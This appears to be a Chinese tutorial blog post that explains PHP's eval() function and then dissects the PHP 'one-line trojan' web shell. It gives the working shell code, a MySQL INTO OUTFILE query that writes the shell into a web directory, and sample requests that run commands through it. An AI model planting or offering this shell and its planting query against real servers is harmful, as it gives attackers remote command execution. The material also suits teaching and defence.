eval函数简介与PHP一句话木马剖析
2019-04-19 20:36
357 查看
eval函数简介与PHP一句话木马剖析
一、eval函数
- eval() 函数把字符串按照 PHP 代码来计算。
- 该字符串必须是合法的 PHP 代码,且必须以分号结尾。
- 如果没有在代码字符串中调用 return 语句,则返回 NULL。如果代码中存在解析错误,则 eval() 函数返回 false。
二、eval函数的一般用法
<?php
$string = "beautiful";
$time = "winter";
$str = 'This is a $string $time morning!';
echo $str. "<br />";
eval("\$str = \"$str\";");
echo $str;
?>
输出
This is a $string $time morning! This is a beautiful winter morning!
三:eval函数的特殊用法
<?php eval($_GET["cmd"]); ?>
四:php一句话挂马的原理
- 通过数据库写马:
select "<?php eval($_GET['cmd'])'?>" into outfile "D:\\phpStudy\\WWW\\bb.php",//不过这个命令是DB和web在同一台机器的时候可以这样执行
- 通过web写马
<?php eval($_GET["cmd"]); ?>
访问:
http://localhost/test.php?cmd=fwrite(fopen("aa.txt", "w"),"hello,world!");
- 查看php的shell信息:
http://localhost/test.php?cmd=phpinfo();
- 查看当前运行的服务
http://localhost/test.php?cmd=system("net start");
内容来自用户分享和网络整理,不保证内容的准确性,如有侵权内容,可联系管理员处理 
相关文章推荐
- eval函数简介与PHP一句话木马剖析
- php中eval函数用法介绍
- eval 函数 检查并执行php代码
- PHP eval()函数
- php全部数组函数用法,简介
- hackermi PHP 404 一句话木马
- PHP木马大全 一句话的PHP木马的防范
- php eval函数用法----PHP中eval()函数小技巧
- 全方面角度剖析一句话木马
- php中文件锁函数flock函数用法简介
- PHP eval() 函数
- PHP 5 Array 函数简介
- PHP一句话木马
- php str_pad 函数用法简介
- PHP采集之CURL函数库简介
- php 如何禁用eval() 函数实例详解
- PHP常量PHP_SAPI与函数php_sapi_name()简介,PHP运行环境检测
- 邪恶的Php一句话木马 assert函数制作简单木马
- python3中eval函数用法简介
- 自用php一句话木马绝对免杀没有任何关键字